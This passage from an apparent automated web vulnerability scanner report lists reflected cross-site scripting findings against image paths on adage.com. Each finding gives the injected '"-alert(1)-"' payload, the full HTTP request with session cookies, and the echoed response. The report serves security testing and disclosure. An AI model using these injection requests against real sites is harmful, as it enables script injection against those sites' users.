Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=6D605979A092ABEE2102FE26C2B4B52BF9F485BE; path=/
Set-Cookie: HMAC=12969DE325D8F47BC149DD88BE224C8BC19AD2B4; path=/
Set-Cookie: HMAC=2520BB77540DA3DD1E2AADCFEABB43BA7A420A5E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
x.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-yahoo.pngb7777"-alert(1)-"a13f0a5b58b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.49. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/netlog.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40098"-alert(1)-"5bdb9e64bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images40098"-alert(1)-"5bdb9e64bb8/save-and-share-icons/netlog.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5DB15248E936155692048AB5E1A27814ABC079FB; path=/
Set-Cookie: HMAC=F2E896BEAFAC63FD27AA2B2C0F668A43C16FA082; path=/
Set-Cookie: HMAC=84C783314D78F7A2E59392367A2E7541518E47EF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images40098"-alert(1)-"5bdb9e64bb8/save-and-share-icons/netlog.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf
...[SNIP]...

1.50. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/netlog.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8e5"-alert(1)-"356cce5b60c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconsaa8e5"-alert(1)-"356cce5b60c/netlog.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B9DE6A2E5668DB792D86574FB9EF7A1D0E1999D8; path=/
Set-Cookie: HMAC=BC8098D5DE4FB3BEE2565047DDFD41AABABA8571; path=/
Set-Cookie: HMAC=C1D6CA5A8519AD4E1D6BC8F5F51B57C7DC37E324; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconsaa8e5"-alert(1)-"356cce5b60c/netlog.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft
...[SNIP]...

1.51. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/netlog.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29180"-alert(1)-"7329e8c1b16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/netlog.png29180"-alert(1)-"7329e8c1b16?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=95A1D404B74E71A653659E651F368E002077580A; path=/
Set-Cookie: HMAC=803EF293FBD747A3743DC3E9C0C6B508235157A3; path=/
Set-Cookie: HMAC=FDF01D53DCACDD2EB0712B07C0C500C3242933F8; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
itbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/netlog.png29180"-alert(1)-"7329e8c1b16"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.52. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/orkut.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ef6f"-alert(1)-"e393df477e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images9ef6f"-alert(1)-"e393df477e/save-and-share-icons/orkut.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F7C04AF9750FD037CC700DD76F32912D4CFD32C6; path=/
Set-Cookie: HMAC=EE53B3C7F94EB877704D81822AECB9FF36810668; path=/
Set-Cookie: HMAC=827A59CAA3BF8FCF82E36B10930DE71A5DCF18C5; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images9ef6f"-alert(1)-"e393df477e/save-and-share-icons/orkut.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf=
...[SNIP]...

1.53. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/orkut.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb17d"-alert(1)-"02e42cf89a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconseb17d"-alert(1)-"02e42cf89a6/orkut.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A3D542D9D8140E3E396644E600DE413B6A444646; path=/
Set-Cookie: HMAC=CBB1D39221D1841A2A5E9BD122875AF1848FF30F; path=/
Set-Cookie: HMAC=FCC719BDD78F0FC769C20FF92F96615D8C5388A1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49474
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconseb17d"-alert(1)-"02e42cf89a6/orkut.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft=
...[SNIP]...

1.54. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/orkut.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad281"-alert(1)-"f7a28624ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/orkut.pngad281"-alert(1)-"f7a28624ad2?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8D070851427E235F74F223B8727F505C1477358E; path=/
Set-Cookie: HMAC=5314A481DFCEC2446FD7BE8BFC5EB797DD7DEBF8; path=/
Set-Cookie: HMAC=6EC9373DE24A34A50C7575EEC6E06C6B3342A79C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49474
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/orkut.pngad281"-alert(1)-"f7a28624ad2"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.55. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/viadeo.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b7c"-alert(1)-"2189b33e4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images66b7c"-alert(1)-"2189b33e4aa/save-and-share-icons/viadeo.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=14A8E7653A1DB57C83129E74A8686535DE4CB7AA; path=/
Set-Cookie: HMAC=59964B6595D0DBEF621DB19254F34AF147E1B16D; path=/
Set-Cookie: HMAC=033890914EC603B86BD8A454B4AA582524502E0B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images66b7c"-alert(1)-"2189b33e4aa/save-and-share-icons/viadeo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf
...[SNIP]...

1.56. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/viadeo.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22daa"-alert(1)-"f28d957d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons22daa"-alert(1)-"f28d957d2d6/viadeo.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BA2A0B8985509B64D493B22EC43D3099FF0B0AF2; path=/
Set-Cookie: HMAC=66D815BCB02ED674D0FE9E0A23B49C51C8D98752; path=/
Set-Cookie: HMAC=7127BE450F47B623EF6AA45795CCC1EF282BEDCB; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons22daa"-alert(1)-"f28d957d2d6/viadeo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft
...[SNIP]...

1.57. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/viadeo.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8f5b"-alert(1)-"4ba0874f211 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/viadeo.pngb8f5b"-alert(1)-"4ba0874f211?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9178AC8C4F4D6A153EA595372096C5EB99ED7FC5; path=/
Set-Cookie: HMAC=A07B6A9AA752EC1B0785AF06B11BCE1485921E64; path=/
Set-Cookie: HMAC=CB9D8F3AB29F6B7C8E2F443C4D71A922AD286B4E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
itbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/viadeo.pngb8f5b"-alert(1)-"4ba0874f211"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.58. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/xing.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b07"-alert(1)-"e0fa823c0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images22b07"-alert(1)-"e0fa823c0eb/save-and-share-icons/xing.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4A32DF99F86ABC0B315B48731EC2417448EAC85B; path=/
Set-Cookie: HMAC=F99F4C5E11DB8B4CCF4C76F2F318BC100E895867; path=/
Set-Cookie: HMAC=3B8003E165F67B38DF0FE866AAC4B4F115960BE6; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images22b07"-alert(1)-"e0fa823c0eb/save-and-share-icons/xing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.59. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/xing.png

Issue detail

